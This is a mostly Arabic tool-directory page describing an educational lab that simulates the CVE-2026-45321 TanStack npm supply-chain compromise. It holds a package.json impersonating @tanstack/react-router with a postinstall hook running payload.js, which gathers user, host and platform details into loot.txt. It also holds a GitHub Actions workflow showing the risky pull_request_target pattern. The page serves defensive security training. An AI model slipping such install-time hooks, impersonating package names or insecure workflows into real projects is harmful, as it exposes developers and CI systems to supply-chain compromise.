Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-45321-Tanstack — مختبر تعليمي يحاكي هجمات سلسلة التوريد npm، وإساءة استخدام CI/CD، وتنفيذ الكود أثناء التثبيت عبر CVE-2026-45321. تدريب أمني دفاعي عملي مع نشر حزم ضارة محلية. | Kitploit
أدوات/GitHubGitHub/7whyex/cve-2026-45321-tanstack
تحليل الثغرات الأمنيةتحليل البرمجيات الخبيثةأمن سلسلة التوريدالتعلم والتعليممختبرات وتدريب عملي
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

مختبر تعليمي يحاكي هجمات سلسلة التوريد npm، وإساءة استخدام CI/CD، وتنفيذ الكود أثناء التثبيت عبر CVE-2026-45321. تدريب أمني دفاعي عملي مع نشر حزم ضارة محلية.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

محاكاة هجوم سلسلة التوريد — CVE-2026-45321 (TanStack)

مختبر تعليمي لفهم هجمات سلسلة التوريد npm، وإساءة استخدام CI/CD، وتنفيذ الشيفرة وقت التثبيت

إخلاء مسؤولية

تم إنشاء هذا المشروع فقط من أجل:

  • تعلم الأمن السيبراني،
  • أبحاث الأمن الدفاعي،
  • محاكاة مختبر محلي،
  • فهم مفهوم هجوم سلسلة التوريد.

لا تستخدم هذا المشروع من أجل:

  • مهاجمة أنظمة حقيقية،
  • سرقة بيانات الاعتماد،
  • نشر البرامج الضارة،
  • الوصول غير المصرح به،
  • أو أي أنشطة غير قانونية أخرى.

الوصف

يحاكي هذا المختبر المفاهيم الأساسية للحادث:

  • CVE-2026-45321
  • TanStack npm Supply Chain Compromise
  • GitHub Actions CI/CD Abuse
  • npm Lifecycle Script Execution

يتم إجراء المحاكاة محليًا وآمنًا دون:

  • سرقة بيانات اعتماد حقيقية،
  • تسريب الرموز،
  • أو اختراق خدمات الطرف الثالث.

هيكل المختبر

root@kitploit:~
lab/
├── fake-repo/          # Simulasi repository target
├── attacker-package/   # Simulasi package malicious
└── victim-project/     # Simulasi korban

آلية عمل المحاكاة

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall script berjalan
        ↓
payload.js dieksekusi otomatis
        ↓
Korban terkena install-time execution

المفاهيم التي يتم تعلمها

  • خطافات دورة حياة npm
  • تنفيذ شيفرة عشوائية وقت التثبيت
  • هجوم سلسلة التوريد
  • حدود الثقة في CI/CD
  • حزمة npm خبيثة
  • إساءة استخدام postinstall
  • اختراق التبعيات

التثبيت

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

إعداد حزمة المهاجم

2. الدخول إلى مجلد حزمة المهاجم

root@kitploit:~
cd attacker-package

3. تثبيت التبعيات

root@kitploit:~
npm install

4. بناء حزمة tarball

root@kitploit:~
npm pack

النتيجة:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

محاكاة الضحية

5. الدخول إلى مشروع الضحية

root@kitploit:~
cd ../victim-project

6. تثبيت الحزمة الخبيثة

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

المخرجات

إذا نجحت، سيظهر:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

وسيتم إنشاء ملف:

root@kitploit:~
loot.txt

تلقائيًا.


مثال payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

مثال package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

محاكاة CI/CD

يمكن أيضًا استخدام هذا المشروع لفهم:

  • GitHub Actions
  • pull_request_target
  • حدود الامتياز في CI/CD
  • تنفيذ التبعيات

مثال لسير العمل:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

العلاقة مع CVE-2026-45321

محاكاة المختبرالعالم الحقيقي
attacker-packageحزمة TanStack المخترقة
payload.jsالمثبت الخبيث
postinstall

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

للأغراض التعليمية فقط

تم إنشاء هذا المختبر لزيادة الوعي حول:

  • أمان سلسلة التوريد،
  • أمان التبعيات،
  • أمان CI/CD،
  • وأبحاث الأمن الدفاعي.
تنزيل الأداة
إساءة استخدام خطاف دورة الحياة
victim-projectمطور/CI ضحية
fake-repoخط أنابيب GitHub Actions